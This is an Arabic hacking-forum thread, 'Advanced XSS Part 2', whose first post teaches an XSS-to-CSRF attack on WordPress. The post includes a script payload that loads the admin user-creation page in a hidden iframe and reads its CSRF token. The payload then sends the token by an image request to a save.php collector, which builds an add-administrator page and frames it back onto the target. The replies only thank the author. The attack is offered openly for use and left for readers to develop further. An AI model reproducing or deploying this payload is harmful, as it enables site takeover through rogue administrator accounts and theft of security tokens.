الوسوم:
حالة الموضوع:
مغلق
  1. a7mdrat

    a7mdrat Developer

    الأنتساب:
    ‏7 أغسطس 2012
    المشاركات:
    31
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    [​IMG]
    اليوم راح نعمل تكملة للطريقة الاولى و كيف ممكن تفيدنا اكثر بطرق اجمل

    الشرح الاول هنا :

    [INFO]http://www.iq-team.org/vb/t23963.html[/INFO]
    اليوم مع التكملة

    الدرس نظري اكثر منه تطبيقي لضيق الوقت شوية و الكسل هههه

    تكلمنا عنا

    XSS to CSRF

    موضوع اليوم نفس الفكرة لكن بطريقة افضل

    يعني ممكن تكتب 1000 استغلال يحدث في رابط واحد هذا هو الهدف

    الفكرة هذه جديدة لم ارها في النت

    ركزوا شوية

    نكمل من الدرس الاول
    كود PHP:
    <iframe id="iframe"  src="http://127.0.0.1/wordpress/wp-admin/user-new.php"></iframe>
    <
    script>

      eval (
    "var wptoken=document.getElementById('iframe').contentDocument.getElementsByTagName('input')[1].value"); 

    document.write("<img src=http://127.0.0.1/save.php?xss=" +wptoken+">");

    </script>

    تمام الكود واضح يسحب التوكن ويرسله الى ملف الطريقة حتى الان ما في جديد

    الان ملف save.php

    لايحفظ الكود مثل ما يحفظ الكوكيز في طريقة السرقة المعروفة

    لكن يولد صفحة اضافة ادمين بالتوكن الجديد و يحفظها على السرفر باسم

    add_admin.html

    ثم نعمل لها iframe في صفحة الهدف
    الاستغلال النهائي

    كود PHP:
    <iframe id="iframe"  src="http://127.0.0.1/wordpress/wp-admin/user-new.php"></iframe>
    <
    script>

      eval (
    "var wptoken=document.getElementById('iframe').contentDocument.getElementsByTagName('input')[1].value"); 

    document.write("<img src=http://127.0.0.1/save.php?xss=" +wptoken+">");
    </script>
    وطبعا الافرام يكون كامل مخفية عن طريق CSS

    واترك لكم التطوير طبعا!:"

     
  2. ABOJANA IRAQY

    ABOJANA IRAQY DeveloPer Plus

    الأنتساب:
    ‏10 مايو 2013
    المشاركات:
    125
    الإعجابات المتلقاة:
    59
    نقاط الجائزة:
    28
    رد: Advanced XSS Part 2

    Thanks
     
  3. Mr-Sp!R!T

    Mr-Sp!R!T Developer

    الأنتساب:
    ‏21 ديسمبر 2012
    المشاركات:
    90
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الإقامة:
    I R A Q
    رد: Advanced XSS Part 2

    شكرا على الطرح​
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة